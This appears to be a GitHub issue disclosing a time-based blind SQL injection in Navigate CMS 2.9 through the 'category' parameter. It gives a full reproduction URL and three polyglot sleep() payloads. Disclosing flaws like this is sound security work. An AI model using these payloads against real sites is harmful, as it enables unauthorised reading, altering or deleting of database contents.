Blind SQL Injection Vulnerability Navigate CMS 2.9

Expected behaviour Blind SQL injection (SQLi) enforced to an injection attack wherein an attacker can execute malicious Blind SQL used to collect information via URL encoded GET input category. Impact Depending on the backend database, the database connection settings, and the operating system, an attacker can mount one or more of the following attacks successfully:

Reading, updating and deleting arbitrary data or tables from the database.
Executing commands on the underlying operating system. Steps to reproduce Inject payload on the category via request: http://10.14.140.69:8012/navigate/navigate/navigate.php?_bogus=1592542677572&act=items_order&category==(select(0)from(select(sleep(0)))v)/*%27%2B(select(0)from(select(sleep(0)))v)%2B%27%22%2B(select(0)from(select(sleep(0)))v)%2B%22*/&fid=items Payload: (select(0)from(select(sleep(0)))v)/'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"/
Payload: (select(0)from(select(sleep(10)))v)/'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"/ Payload: (select(0)from(select(sleep(20)))v)/'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/

NavigateCMS / Navigate-CMS

Blind SQL Injection Vulnerability Navigate CMS 2.9 #20